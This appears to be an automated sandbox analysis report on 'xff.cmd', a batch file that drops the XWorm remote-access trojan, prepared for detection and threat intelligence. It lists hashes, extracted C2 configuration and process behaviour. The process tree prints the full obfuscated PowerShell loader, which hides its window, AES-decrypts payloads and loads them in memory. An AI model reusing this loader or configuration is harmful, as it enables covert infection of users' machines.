Analysis
-
max time kernel
139s -
max time network
160s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
23-05-2024 16:41
Static task
static1
Behavioral task
behavioral1
Sample
xff.cmd
Resource
win7-20240215-en
General
-
Target
xff.cmd
-
Size
64KB
-
MD5
fa0ef860ffb4c4c8785edbf41a09ed46
-
SHA1
58e4dddc140fd43397ec9ac7a837ffd119438b3f
-
SHA256
d03cdb6f745777a9b759cc7b348bfa131ff9228abfa7b468427025331c6cbeb6
-
SHA512
ad3acaca45746495ff2158d0736aab9b642a1c75ba8b40ea6250b78cd59fc081145278793d4a9874aada2bc37cc11d233151660219a5b5de3c5b64d08fe40bdc
-
SSDEEP
1536:f/X/G7+gF7PV7f4ENwLaDu83y9vt93hSqAf+3DUwL:f/X/lgFl4ENwLb83y9vtVjYwL
Malware Config
Extracted
xworm
3.1
nmds.duckdns.org:8895
O3B5rRVaa3oX74CD
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4516-31-0x0000022F2C6C0000-0x0000022F2C6CE000-memory.dmp family_xworm -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 24 4516 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 4516 powershell.exe 4268 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 4516 powershell.exe 4516 powershell.exe 4268 powershell.exe 4268 powershell.exe 4516 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4516 powershell.exe Token: SeDebugPrivilege 4268 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 4516 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
cmd.execmd.exepowershell.exedescription pid process target process PID 1448 wrote to memory of 3908 1448 cmd.exe cmd.exe PID 1448 wrote to memory of 3908 1448 cmd.exe cmd.exe PID 1448 wrote to memory of 3360 1448 cmd.exe cmd.exe PID 1448 wrote to memory of 3360 1448 cmd.exe cmd.exe PID 3360 wrote to memory of 4312 3360 cmd.exe cmd.exe PID 3360 wrote to memory of 4312 3360 cmd.exe cmd.exe PID 3360 wrote to memory of 4648 3360 cmd.exe cmd.exe PID 3360 wrote to memory of 4648 3360 cmd.exe cmd.exe PID 3360 wrote to memory of 4516 3360 cmd.exe powershell.exe PID 3360 wrote to memory of 4516 3360 cmd.exe powershell.exe PID 4516 wrote to memory of 4268 4516 powershell.exe powershell.exe PID 4516 wrote to memory of 4268 4516 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\xff.cmd"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c \"set __=^&rem\2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\xff.cmd2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c \"set __=^&rem\3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\xff.cmd';$PBbd='REirTeaEirTdLEirTiEirTneEirTsEirT'.Replace('EirT', ''),'ECvmXnCvmXtrCvmXyPCvmXoCvmXinCvmXtCvmX'.Replace('CvmX', ''),'SpJFAilJFAiiJFAitJFAi'.Replace('JFAi', ''),'CoqVcTpyqVcTTqVcToqVcT'.Replace('qVcT', ''),'MIOlkaIOlkinIOlkMIOlkoduIOlklIOlkeIOlk'.Replace('IOlk', ''),'ChaZoLxngZoLxeEZoLxxZoLxteZoLxnsZoLxiZoLxoZoLxnZoLx'.Replace('ZoLx', ''),'ElekLvxmkLvxekLvxntkLvxAtkLvx'.Replace('kLvx', ''),'LosYUQasYUQdsYUQ'.Replace('sYUQ', ''),'InvnulYoknulYenulY'.Replace('nulY', ''),'GetIJNsCuIJNsrreIJNsntPIJNsroIJNsceIJNssIJNssIJNs'.Replace('IJNs', ''),'CQFbXreQFbXaQFbXtQFbXeQFbXDecQFbXrypQFbXtoQFbXrQFbX'.Replace('QFbX', ''),'FraBWvomaBWvBasaBWveaBWv64aBWvStaBWvriaBWvnaBWvgaBWv'.Replace('aBWv', ''),'DeurjGcourjGmurjGpreurjGsurjGsurjG'.Replace('urjG', ''),'TrmyUjanmyUjsmyUjfmyUjomyUjrmFmyUjinamyUjlBmyUjlocmyUjkmyUj'.Replace('myUj', '');powershell -w hidden;function qwncL($QXTPa){$EXxOl=[System.Security.Cryptography.Aes]::Create();$EXxOl.Mode=[System.Security.Cryptography.CipherMode]::CBC;$EXxOl.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$EXxOl.Key=[System.Convert]::($PBbd[11])('XHpn/JZ7TsfLX+PpsINKLy+MpWXBsJxjn60Bdg7Z+FQ=');$EXxOl.IV=[System.Convert]::($PBbd[11])('68WBRJ74PNWh3trKlbXclQ==');$GJgIu=$EXxOl.($PBbd[10])();$OYtEh=$GJgIu.($PBbd[13])($QXTPa,0,$QXTPa.Length);$GJgIu.Dispose();$EXxOl.Dispose();$OYtEh;}function lfmoi($QXTPa){$NKsyX=New-Object System.IO.MemoryStream(,$QXTPa);$mMIgg=New-Object System.IO.MemoryStream;$vKCth=New-Object System.IO.Compression.GZipStream($NKsyX,[IO.Compression.CompressionMode]::($PBbd[12]));$vKCth.($PBbd[3])($mMIgg);$vKCth.Dispose();$NKsyX.Dispose();$mMIgg.Dispose();$mMIgg.ToArray();}$crDhE=[System.IO.File]::($PBbd[0])([Console]::Title);$NIvxt=lfmoi (qwncL ([Convert]::($PBbd[11])([System.Linq.Enumerable]::($PBbd[6])($crDhE, 5).Substring(2))));$lZPem=lfmoi (qwncL ([Convert]::($PBbd[11])([System.Linq.Enumerable]::($PBbd[6])($crDhE, 6).Substring(2))));[System.Reflection.Assembly]::($PBbd[7])([byte[]]$lZPem).($PBbd[1]).($PBbd[8])($null,$null);[System.Reflection.Assembly]::($PBbd[7])([byte[]]$NIvxt).($PBbd[1]).($PBbd[8])($null,$null); "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4064 --field-trial-handle=2356,i,13261194862334667799,7441241219475888176,262144 --variations-seed-version /prefetch:81⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jm12cygf.bje.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/4516-27-0x0000022F2C330000-0x0000022F2C342000-memory.dmpFilesize
72KB
-
memory/4516-28-0x00007FFFC4C70000-0x00007FFFC4E65000-memory.dmpFilesize
2.0MB
-
memory/4516-11-0x00007FFFA5280000-0x00007FFFA5D41000-memory.dmpFilesize
10.8MB
-
memory/4516-12-0x00007FFFA5280000-0x00007FFFA5D41000-memory.dmpFilesize
10.8MB
-
memory/4516-13-0x0000022F2C710000-0x0000022F2C754000-memory.dmpFilesize
272KB
-
memory/4516-14-0x00007FFFA5280000-0x00007FFFA5D41000-memory.dmpFilesize
10.8MB
-
memory/4516-6-0x0000022F2C290000-0x0000022F2C2B2000-memory.dmpFilesize
136KB
-
memory/4516-0-0x00007FFFA5283000-0x00007FFFA5285000-memory.dmpFilesize
8KB
-
memory/4516-15-0x0000022F2C7E0000-0x0000022F2C856000-memory.dmpFilesize
472KB
-
memory/4516-30-0x0000022F2C370000-0x0000022F2C37C000-memory.dmpFilesize
48KB
-
memory/4516-29-0x00007FFFC30F0000-0x00007FFFC31AE000-memory.dmpFilesize
760KB
-
memory/4516-31-0x0000022F2C6C0000-0x0000022F2C6CE000-memory.dmpFilesize
56KB
-
memory/4516-33-0x00007FFFA5283000-0x00007FFFA5285000-memory.dmpFilesize
8KB
-
memory/4516-34-0x00007FFFA5280000-0x00007FFFA5D41000-memory.dmpFilesize
10.8MB
-
memory/4516-35-0x00007FFFA5280000-0x00007FFFA5D41000-memory.dmpFilesize
10.8MB